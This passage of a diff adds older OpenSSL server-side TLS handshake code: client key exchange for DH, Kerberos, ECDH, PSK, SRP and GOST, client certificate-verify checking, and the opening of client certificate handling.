+            dh_srvr = s->s3->tmp.dh;
+
+        if (n == 0L) {
+            /* Get pubkey from cert */
+            EVP_PKEY *clkey = X509_get_pubkey(s->session->peer);
+            if (clkey) {
+                if (EVP_PKEY_cmp_parameters(clkey, skey) == 1)
+                    dh_clnt = EVP_PKEY_get1_DH(clkey);
+            }
+            if (dh_clnt == NULL) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       SSL_R_MISSING_TMP_DH_KEY);
+                goto f_err;
+            }
+            EVP_PKEY_free(clkey);
+            pub = dh_clnt->pub_key;
+        } else
+            pub = BN_bin2bn(p, i, NULL);
+        if (pub == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, SSL_R_BN_LIB);
+            goto err;
+        }
+
+        i = DH_compute_key(p, pub, dh_srvr);
+
+        if (i <= 0) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_DH_LIB);
+            BN_clear_free(pub);
+            goto err;
+        }
+
+        DH_free(s->s3->tmp.dh);
+        s->s3->tmp.dh = NULL;
+        if (dh_clnt)
+            DH_free(dh_clnt);
+        else
+            BN_clear_free(pub);
+        pub = NULL;
+        s->session->master_key_length =
+            s->method->ssl3_enc->generate_master_secret(s,
+                                                        s->
+                                                        session->master_key,
+                                                        p, i);
+        OPENSSL_cleanse(p, i);
+        if (dh_clnt)
+            return 2;
+    } else
+#endif
+#ifndef OPENSSL_NO_KRB5
+    if (alg_k & SSL_kKRB5) {
+        krb5_error_code krb5rc;
+        krb5_data enc_ticket;
+        krb5_data authenticator;
+        krb5_data enc_pms;
+        KSSL_CTX *kssl_ctx = s->kssl_ctx;
+        EVP_CIPHER_CTX ciph_ctx;
+        const EVP_CIPHER *enc = NULL;
+        unsigned char iv[EVP_MAX_IV_LENGTH];
+        unsigned char pms[SSL_MAX_MASTER_KEY_LENGTH + EVP_MAX_BLOCK_LENGTH];
+        int padl, outl;
+        krb5_timestamp authtime = 0;
+        krb5_ticket_times ttimes;
+
+        EVP_CIPHER_CTX_init(&ciph_ctx);
+
+        if (!kssl_ctx)
+            kssl_ctx = kssl_ctx_new();
+
+        n2s(p, i);
+        enc_ticket.length = i;
+
+        if (n < (long)(enc_ticket.length + 6)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DATA_LENGTH_TOO_LONG);
+            goto err;
+        }
+
+        enc_ticket.data = (char *)p;
+        p += enc_ticket.length;
+
+        n2s(p, i);
+        authenticator.length = i;
+
+        if (n < (long)(enc_ticket.length + authenticator.length + 6)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DATA_LENGTH_TOO_LONG);
+            goto err;
+        }
+
+        authenticator.data = (char *)p;
+        p += authenticator.length;
+
+        n2s(p, i);
+        enc_pms.length = i;
+        enc_pms.data = (char *)p;
+        p += enc_pms.length;
+
+        /*
+         * Note that the length is checked again below, ** after decryption
+         */
+        if (enc_pms.length > sizeof pms) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DATA_LENGTH_TOO_LONG);
+            goto err;
+        }
+
+        if (n != (long)(enc_ticket.length + authenticator.length +
+                        enc_pms.length + 6)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DATA_LENGTH_TOO_LONG);
+            goto err;
+        }
+
+        if ((krb5rc = kssl_sget_tkt(kssl_ctx, &enc_ticket, &ttimes,
+                                    &kssl_err)) != 0) {
+# ifdef KSSL_DEBUG
+            fprintf(stderr, "kssl_sget_tkt rtn %d [%d]\n",
+                    krb5rc, kssl_err.reason);
+            if (kssl_err.text)
+                fprintf(stderr, "kssl_err text= %s\n", kssl_err.text);
+# endif                         /* KSSL_DEBUG */
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, kssl_err.reason);
+            goto err;
+        }
+
+        /*
+         * Note: no authenticator is not considered an error, ** but will
+         * return authtime == 0.
+         */
+        if ((krb5rc = kssl_check_authent(kssl_ctx, &authenticator,
+                                         &authtime, &kssl_err)) != 0) {
+# ifdef KSSL_DEBUG
+            fprintf(stderr, "kssl_check_authent rtn %d [%d]\n",
+                    krb5rc, kssl_err.reason);
+            if (kssl_err.text)
+                fprintf(stderr, "kssl_err text= %s\n", kssl_err.text);
+# endif                         /* KSSL_DEBUG */
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, kssl_err.reason);
+            goto err;
+        }
+
+        if ((krb5rc = kssl_validate_times(authtime, &ttimes)) != 0) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, krb5rc);
+            goto err;
+        }
+# ifdef KSSL_DEBUG
+        kssl_ctx_show(kssl_ctx);
+# endif                         /* KSSL_DEBUG */
+
+        enc = kssl_map_enc(kssl_ctx->enctype);
+        if (enc == NULL)
+            goto err;
+
+        memset(iv, 0, sizeof iv); /* per RFC 1510 */
+
+        if (!EVP_DecryptInit_ex(&ciph_ctx, enc, NULL, kssl_ctx->key, iv)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DECRYPTION_FAILED);
+            goto err;
+        }
+        if (!EVP_DecryptUpdate(&ciph_ctx, pms, &outl,
+                               (unsigned char *)enc_pms.data, enc_pms.length))
+        {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DECRYPTION_FAILED);
+            goto err;
+        }
+        if (outl > SSL_MAX_MASTER_KEY_LENGTH) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DATA_LENGTH_TOO_LONG);
+            goto err;
+        }
+        if (!EVP_DecryptFinal_ex(&ciph_ctx, &(pms[outl]), &padl)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DECRYPTION_FAILED);
+            goto err;
+        }
+        outl += padl;
+        if (outl > SSL_MAX_MASTER_KEY_LENGTH) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DATA_LENGTH_TOO_LONG);
+            goto err;
+        }
+        if (!((pms[0] == (s->client_version >> 8))
+              && (pms[1] == (s->client_version & 0xff)))) {
+            /*
+             * The premaster secret must contain the same version number as
+             * the ClientHello to detect version rollback attacks (strangely,
+             * the protocol does not offer such protection for DH
+             * ciphersuites). However, buggy clients exist that send random
+             * bytes instead of the protocol version. If
+             * SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients.
+             * (Perhaps we should have a separate BUG value for the Kerberos
+             * cipher)
+             */
+            if (!(s->options & SSL_OP_TLS_ROLLBACK_BUG)) {
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       SSL_AD_DECODE_ERROR);
+                goto err;
+            }
+        }
+
+        EVP_CIPHER_CTX_cleanup(&ciph_ctx);
+
+        s->session->master_key_length =
+            s->method->ssl3_enc->generate_master_secret(s,
+                                                        s->
+                                                        session->master_key,
+                                                        pms, outl);
+
+        if (kssl_ctx->client_princ) {
+            size_t len = strlen(kssl_ctx->client_princ);
+            if (len < SSL_MAX_KRB5_PRINCIPAL_LENGTH) {
+                s->session->krb5_client_princ_len = len;
+                memcpy(s->session->krb5_client_princ, kssl_ctx->client_princ,
+                       len);
+            }
+        }
+
+        /*- Was doing kssl_ctx_free() here,
+         *  but it caused problems for apache.
+         *  kssl_ctx = kssl_ctx_free(kssl_ctx);
+         *  if (s->kssl_ctx)  s->kssl_ctx = NULL;
+         */
+    } else
+#endif                          /* OPENSSL_NO_KRB5 */
+
+#ifndef OPENSSL_NO_ECDH
+    if (alg_k & (SSL_kEECDH | SSL_kECDHr | SSL_kECDHe)) {
+        int ret = 1;
+        int field_size = 0;
+        const EC_KEY *tkey;
+        const EC_GROUP *group;
+        const BIGNUM *priv_key;
+
+        /* initialize structures for server's ECDH key pair */
+        if ((srvr_ecdh = EC_KEY_new()) == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        /* Let's get server private key and group information */
+        if (alg_k & (SSL_kECDHr | SSL_kECDHe)) {
+            /* use the certificate */
+            tkey = s->cert->pkeys[SSL_PKEY_ECC].privatekey->pkey.ec;
+        } else {
+            /*
+             * use the ephermeral values we saved when generating the
+             * ServerKeyExchange msg.
+             */
+            tkey = s->s3->tmp.ecdh;
+        }
+
+        group = EC_KEY_get0_group(tkey);
+        priv_key = EC_KEY_get0_private_key(tkey);
+
+        if (!EC_KEY_set_group(srvr_ecdh, group) ||
+            !EC_KEY_set_private_key(srvr_ecdh, priv_key)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_EC_LIB);
+            goto err;
+        }
+
+        /* Let's get client's public key */
+        if ((clnt_ecpoint = EC_POINT_new(group)) == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        if (n == 0L) {
+            /* Client Publickey was in Client Certificate */
+
+            if (alg_k & SSL_kEECDH) {
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       SSL_R_MISSING_TMP_ECDH_KEY);
+                goto f_err;
+            }
+            if (((clnt_pub_pkey = X509_get_pubkey(s->session->peer))
+                 == NULL) || (clnt_pub_pkey->type != EVP_PKEY_EC)) {
+                /*
+                 * XXX: For now, we do not support client authentication
+                 * using ECDH certificates so this branch (n == 0L) of the
+                 * code is never executed. When that support is added, we
+                 * ought to ensure the key received in the certificate is
+                 * authorized for key agreement. ECDH_compute_key implicitly
+                 * checks that the two ECDH shares are for the same group.
+                 */
+                al = SSL_AD_HANDSHAKE_FAILURE;
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       SSL_R_UNABLE_TO_DECODE_ECDH_CERTS);
+                goto f_err;
+            }
+
+            if (EC_POINT_copy(clnt_ecpoint,
+                              EC_KEY_get0_public_key(clnt_pub_pkey->
+                                                     pkey.ec)) == 0) {
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_EC_LIB);
+                goto err;
+            }
+            ret = 2;            /* Skip certificate verify processing */
+        } else {
+            /*
+             * Get client's public key from encoded point in the
+             * ClientKeyExchange message.
+             */
+            if ((bn_ctx = BN_CTX_new()) == NULL) {
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                       ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+
+            /* Get encoded point length */
+            i = *p;
+            p += 1;
+            if (n != 1 + i) {
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_EC_LIB);
+                goto err;
+            }
+            if (EC_POINT_oct2point(group, clnt_ecpoint, p, i, bn_ctx) == 0) {
+                SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_EC_LIB);
+                goto err;
+            }
+            /*
+             * p is pointing to somewhere in the buffer currently, so set it
+             * to the start
+             */
+            p = (unsigned char *)s->init_buf->data;
+        }
+
+        /* Compute the shared pre-master secret */
+        field_size = EC_GROUP_get_degree(group);
+        if (field_size <= 0) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_ECDH_LIB);
+            goto err;
+        }
+        i = ECDH_compute_key(p, (field_size + 7) / 8, clnt_ecpoint, srvr_ecdh,
+                             NULL);
+        if (i <= 0) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_ECDH_LIB);
+            goto err;
+        }
+
+        EVP_PKEY_free(clnt_pub_pkey);
+        EC_POINT_free(clnt_ecpoint);
+        EC_KEY_free(srvr_ecdh);
+        BN_CTX_free(bn_ctx);
+        EC_KEY_free(s->s3->tmp.ecdh);
+        s->s3->tmp.ecdh = NULL;
+
+        /* Compute the master secret */
+        s->session->master_key_length =
+            s->method->ssl3_enc->generate_master_secret(s,
+                                                        s->
+                                                        session->master_key,
+                                                        p, i);
+
+        OPENSSL_cleanse(p, i);
+        return (ret);
+    } else
+#endif
+#ifndef OPENSSL_NO_PSK
+    if (alg_k & SSL_kPSK) {
+        unsigned char *t = NULL;
+        unsigned char psk_or_pre_ms[PSK_MAX_PSK_LEN * 2 + 4];
+        unsigned int pre_ms_len = 0, psk_len = 0;
+        int psk_err = 1;
+        char tmp_id[PSK_MAX_IDENTITY_LEN + 1];
+
+        al = SSL_AD_HANDSHAKE_FAILURE;
+
+        n2s(p, i);
+        if (n != i + 2) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, SSL_R_LENGTH_MISMATCH);
+            goto psk_err;
+        }
+        if (i > PSK_MAX_IDENTITY_LEN) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DATA_LENGTH_TOO_LONG);
+            goto psk_err;
+        }
+        if (s->psk_server_callback == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_PSK_NO_SERVER_CB);
+            goto psk_err;
+        }
+
+        /*
+         * Create guaranteed NULL-terminated identity string for the callback
+         */
+        memcpy(tmp_id, p, i);
+        memset(tmp_id + i, 0, PSK_MAX_IDENTITY_LEN + 1 - i);
+        psk_len = s->psk_server_callback(s, tmp_id,
+                                         psk_or_pre_ms,
+                                         sizeof(psk_or_pre_ms));
+        OPENSSL_cleanse(tmp_id, PSK_MAX_IDENTITY_LEN + 1);
+
+        if (psk_len > PSK_MAX_PSK_LEN) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
+            goto psk_err;
+        } else if (psk_len == 0) {
+            /*
+             * PSK related to the given identity not found
+             */
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_PSK_IDENTITY_NOT_FOUND);
+            al = SSL_AD_UNKNOWN_PSK_IDENTITY;
+            goto psk_err;
+        }
+
+        /* create PSK pre_master_secret */
+        pre_ms_len = 2 + psk_len + 2 + psk_len;
+        t = psk_or_pre_ms;
+        memmove(psk_or_pre_ms + psk_len + 4, psk_or_pre_ms, psk_len);
+        s2n(psk_len, t);
+        memset(t, 0, psk_len);
+        t += psk_len;
+        s2n(psk_len, t);
+
+        if (s->session->psk_identity != NULL)
+            OPENSSL_free(s->session->psk_identity);
+        s->session->psk_identity = BUF_strdup((char *)p);
+        if (s->session->psk_identity == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto psk_err;
+        }
+
+        if (s->session->psk_identity_hint != NULL)
+            OPENSSL_free(s->session->psk_identity_hint);
+        s->session->psk_identity_hint = BUF_strdup(s->ctx->psk_identity_hint);
+        if (s->ctx->psk_identity_hint != NULL &&
+            s->session->psk_identity_hint == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto psk_err;
+        }
+
+        s->session->master_key_length =
+            s->method->ssl3_enc->generate_master_secret(s,
+                                                        s->
+                                                        session->master_key,
+                                                        psk_or_pre_ms,
+                                                        pre_ms_len);
+        psk_err = 0;
+ psk_err:
+        OPENSSL_cleanse(psk_or_pre_ms, sizeof(psk_or_pre_ms));
+        if (psk_err != 0)
+            goto f_err;
+    } else
+#endif
+#ifndef OPENSSL_NO_SRP
+    if (alg_k & SSL_kSRP) {
+        int param_len;
+
+        n2s(p, i);
+        param_len = i + 2;
+        if (param_len > n) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_BAD_SRP_A_LENGTH);
+            goto f_err;
+        }
+        if (!(s->srp_ctx.A = BN_bin2bn(p, i, NULL))) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        if (BN_ucmp(s->srp_ctx.A, s->srp_ctx.N) >= 0
+            || BN_is_zero(s->srp_ctx.A)) {
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_BAD_SRP_PARAMETERS);
+            goto f_err;
+        }
+        if (s->session->srp_username != NULL)
+            OPENSSL_free(s->session->srp_username);
+        s->session->srp_username = BUF_strdup(s->srp_ctx.login);
+        if (s->session->srp_username == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        if ((s->session->master_key_length =
+             SRP_generate_server_master_secret(s,
+                                               s->session->master_key)) < 0) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+
+        p += i;
+    } else
+#endif                          /* OPENSSL_NO_SRP */
+    if (alg_k & SSL_kGOST) {
+        int ret = 0;
+        EVP_PKEY_CTX *pkey_ctx;
+        EVP_PKEY *client_pub_pkey = NULL, *pk = NULL;
+        unsigned char premaster_secret[32], *start;
+        size_t outlen = 32, inlen;
+        unsigned long alg_a;
+        int Ttag, Tclass;
+        long Tlen;
+
+        /* Get our certificate private key */
+        alg_a = s->s3->tmp.new_cipher->algorithm_auth;
+        if (alg_a & SSL_aGOST94)
+            pk = s->cert->pkeys[SSL_PKEY_GOST94].privatekey;
+        else if (alg_a & SSL_aGOST01)
+            pk = s->cert->pkeys[SSL_PKEY_GOST01].privatekey;
+
+        pkey_ctx = EVP_PKEY_CTX_new(pk, NULL);
+        EVP_PKEY_decrypt_init(pkey_ctx);
+        /*
+         * If client certificate is present and is of the same type, maybe
+         * use it for key exchange.  Don't mind errors from
+         * EVP_PKEY_derive_set_peer, because it is completely valid to use a
+         * client certificate for authorization only.
+         */
+        client_pub_pkey = X509_get_pubkey(s->session->peer);
+        if (client_pub_pkey) {
+            if (EVP_PKEY_derive_set_peer(pkey_ctx, client_pub_pkey) <= 0)
+                ERR_clear_error();
+        }
+        /* Decrypt session key */
+        if (ASN1_get_object
+            ((const unsigned char **)&p, &Tlen, &Ttag, &Tclass,
+             n) != V_ASN1_CONSTRUCTED || Ttag != V_ASN1_SEQUENCE
+            || Tclass != V_ASN1_UNIVERSAL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DECRYPTION_FAILED);
+            goto gerr;
+        }
+        start = p;
+        inlen = Tlen;
+        if (EVP_PKEY_decrypt
+            (pkey_ctx, premaster_secret, &outlen, start, inlen) <= 0) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
+                   SSL_R_DECRYPTION_FAILED);
+            goto gerr;
+        }
+        /* Generate master secret */
+        s->session->master_key_length =
+            s->method->ssl3_enc->generate_master_secret(s,
+                                                        s->
+                                                        session->master_key,
+                                                        premaster_secret, 32);
+        /* Check if pubkey from client certificate was used */
+        if (EVP_PKEY_CTX_ctrl
+            (pkey_ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 2, NULL) > 0)
+            ret = 2;
+        else
+            ret = 1;
+ gerr:
+        EVP_PKEY_free(client_pub_pkey);
+        EVP_PKEY_CTX_free(pkey_ctx);
+        if (ret)
+            return ret;
+        else
+            goto err;
+    } else {
+        al = SSL_AD_HANDSHAKE_FAILURE;
+        SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, SSL_R_UNKNOWN_CIPHER_TYPE);
+        goto f_err;
+    }
+
+    return (1);
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+#if !defined(OPENSSL_NO_DH) || !defined(OPENSSL_NO_RSA) || !defined(OPENSSL_NO_ECDH) || defined(OPENSSL_NO_SRP)
+ err:
+#endif
+#ifndef OPENSSL_NO_ECDH
+    EVP_PKEY_free(clnt_pub_pkey);
+    EC_POINT_free(clnt_ecpoint);
+    if (srvr_ecdh != NULL)
+        EC_KEY_free(srvr_ecdh);
+    BN_CTX_free(bn_ctx);
+#endif
+    return (-1);
+}
+
+int ssl3_get_cert_verify(SSL *s)
+{
+    EVP_PKEY *pkey = NULL;
+    unsigned char *p;
+    int al, ok, ret = 0;
+    long n;
+    int type = 0, i, j;
+    X509 *peer;
+    const EVP_MD *md = NULL;
+    EVP_MD_CTX mctx;
+    EVP_MD_CTX_init(&mctx);
+
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_SR_CERT_VRFY_A,
+                                   SSL3_ST_SR_CERT_VRFY_B,
+                                   -1, SSL3_RT_MAX_PLAIN_LENGTH, &ok);
+
+    if (!ok)
+        return ((int)n);
+
+    if (s->session->peer != NULL) {
+        peer = s->session->peer;
+        pkey = X509_get_pubkey(peer);
+        type = X509_certificate_type(peer, pkey);
+    } else {
+        peer = NULL;
+        pkey = NULL;
+    }
+
+    if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_VERIFY) {
+        s->s3->tmp.reuse_message = 1;
+        if (peer != NULL) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_MISSING_VERIFY_MESSAGE);
+            goto f_err;
+        }
+        ret = 1;
+        goto end;
+    }
+
+    if (peer == NULL) {
+        SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_NO_CLIENT_CERT_RECEIVED);
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        goto f_err;
+    }
+
+    if (!(type & EVP_PKT_SIGN)) {
+        SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
+               SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE);
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        goto f_err;
+    }
+
+    if (s->s3->change_cipher_spec) {
+        SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_CCS_RECEIVED_EARLY);
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        goto f_err;
+    }
+
+    /* we now have a signature that we need to verify */
+    p = (unsigned char *)s->init_msg;
+    /* Check for broken implementations of GOST ciphersuites */
+    /*
+     * If key is GOST and n is exactly 64, it is bare signature without
+     * length field
+     */
+    if (n == 64 && (pkey->type == NID_id_GostR3410_94 ||
+                    pkey->type == NID_id_GostR3410_2001)) {
+        i = 64;
+    } else {
+        if (SSL_USE_SIGALGS(s)) {
+            int rv = tls12_check_peer_sigalg(&md, s, p, pkey);
+            if (rv == -1) {
+                al = SSL_AD_INTERNAL_ERROR;
+                goto f_err;
+            } else if (rv == 0) {
+                al = SSL_AD_DECODE_ERROR;
+                goto f_err;
+            }
+#ifdef SSL_DEBUG
+            fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
+#endif
+            p += 2;
+            n -= 2;
+        }
+        n2s(p, i);
+        n -= 2;
+        if (i > n) {
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_LENGTH_MISMATCH);
+            al = SSL_AD_DECODE_ERROR;
+            goto f_err;
+        }
+    }
+    j = EVP_PKEY_size(pkey);
+    if ((i > j) || (n > j) || (n <= 0)) {
+        SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_WRONG_SIGNATURE_SIZE);
+        al = SSL_AD_DECODE_ERROR;
+        goto f_err;
+    }
+
+    if (SSL_USE_SIGALGS(s)) {
+        long hdatalen = 0;
+        void *hdata;
+        hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
+        if (hdatalen <= 0) {
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_INTERNAL_ERROR);
+            al = SSL_AD_INTERNAL_ERROR;
+            goto f_err;
+        }
+#ifdef SSL_DEBUG
+        fprintf(stderr, "Using TLS 1.2 with client verify alg %s\n",
+                EVP_MD_name(md));
+#endif
+        if (!EVP_VerifyInit_ex(&mctx, md, NULL)
+            || !EVP_VerifyUpdate(&mctx, hdata, hdatalen)) {
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_EVP_LIB);
+            al = SSL_AD_INTERNAL_ERROR;
+            goto f_err;
+        }
+
+        if (EVP_VerifyFinal(&mctx, p, i, pkey) <= 0) {
+            al = SSL_AD_DECRYPT_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_BAD_SIGNATURE);
+            goto f_err;
+        }
+    } else
+#ifndef OPENSSL_NO_RSA
+    if (pkey->type == EVP_PKEY_RSA) {
+        i = RSA_verify(NID_md5_sha1, s->s3->tmp.cert_verify_md,
+                       MD5_DIGEST_LENGTH + SHA_DIGEST_LENGTH, p, i,
+                       pkey->pkey.rsa);
+        if (i < 0) {
+            al = SSL_AD_DECRYPT_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_BAD_RSA_DECRYPT);
+            goto f_err;
+        }
+        if (i == 0) {
+            al = SSL_AD_DECRYPT_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_BAD_RSA_SIGNATURE);
+            goto f_err;
+        }
+    } else
+#endif
+#ifndef OPENSSL_NO_DSA
+    if (pkey->type == EVP_PKEY_DSA) {
+        j = DSA_verify(pkey->save_type,
+                       &(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
+                       SHA_DIGEST_LENGTH, p, i, pkey->pkey.dsa);
+        if (j <= 0) {
+            /* bad signature */
+            al = SSL_AD_DECRYPT_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_BAD_DSA_SIGNATURE);
+            goto f_err;
+        }
+    } else
+#endif
+#ifndef OPENSSL_NO_ECDSA
+    if (pkey->type == EVP_PKEY_EC) {
+        j = ECDSA_verify(pkey->save_type,
+                         &(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
+                         SHA_DIGEST_LENGTH, p, i, pkey->pkey.ec);
+        if (j <= 0) {
+            /* bad signature */
+            al = SSL_AD_DECRYPT_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_BAD_ECDSA_SIGNATURE);
+            goto f_err;
+        }
+    } else
+#endif
+    if (pkey->type == NID_id_GostR3410_94
+            || pkey->type == NID_id_GostR3410_2001) {
+        unsigned char signature[64];
+        int idx;
+        EVP_PKEY_CTX *pctx = EVP_PKEY_CTX_new(pkey, NULL);
+        EVP_PKEY_verify_init(pctx);
+        if (i != 64) {
+            fprintf(stderr, "GOST signature length is %d", i);
+        }
+        for (idx = 0; idx < 64; idx++) {
+            signature[63 - idx] = p[idx];
+        }
+        j = EVP_PKEY_verify(pctx, signature, 64, s->s3->tmp.cert_verify_md,
+                            32);
+        EVP_PKEY_CTX_free(pctx);
+        if (j <= 0) {
+            al = SSL_AD_DECRYPT_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, SSL_R_BAD_ECDSA_SIGNATURE);
+            goto f_err;
+        }
+    } else {
+        SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_INTERNAL_ERROR);
+        al = SSL_AD_UNSUPPORTED_CERTIFICATE;
+        goto f_err;
+    }
+
+    ret = 1;
+    if (0) {
+ f_err:
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    }
+ end:
+    if (s->s3->handshake_buffer) {
+        BIO_free(s->s3->handshake_buffer);
+        s->s3->handshake_buffer = NULL;
+        s->s3->flags &= ~TLS1_FLAGS_KEEP_HANDSHAKE;
+    }
+    EVP_MD_CTX_cleanup(&mctx);
+    EVP_PKEY_free(pkey);
+    return (ret);
+}
+
+int ssl3_get_client_certificate(SSL *s)
+{
+    int i, ok, al, ret = -1;
+    X509 *x = NULL;
+    unsigned long l, nc, llen, n;
+    const unsigned char *p, *q;
+    unsigned char *d;
+    STACK_OF(X509) *sk = NULL;
+
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_SR_CERT_A,
+                                   SSL3_ST_SR_CERT_B,
+                                   -1, s->max_cert_list, &ok);
+
+    if (!ok)
+        return ((int)n);
+
+    if (s->s3->tmp.message_type == SSL3_MT_CLIENT_KEY_EXCHANGE) {
+        if ((s->verify_mode & SSL_VERIFY_PEER) &&
+            (s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
+                   SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
+            al = SSL_AD_HANDSHAKE_FAILURE;
+            goto f_err;
+        }
+        /*
+         * If tls asked for a client cert, the client must return a 0 list
+         */
+        if ((s->version > SSL3_VERSION) && s->s3->tmp.cert_request) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
+                   SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST);
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            goto f_err;
+        }
+        s->s3->tmp.reuse_message = 1;
+        return (1);
+    }
+
+    if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE) {
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, SSL_R_WRONG_MESSAGE_TYPE);
+        goto f_err;
+    }
+    p = d = (unsigned char *)s->init_msg;
+
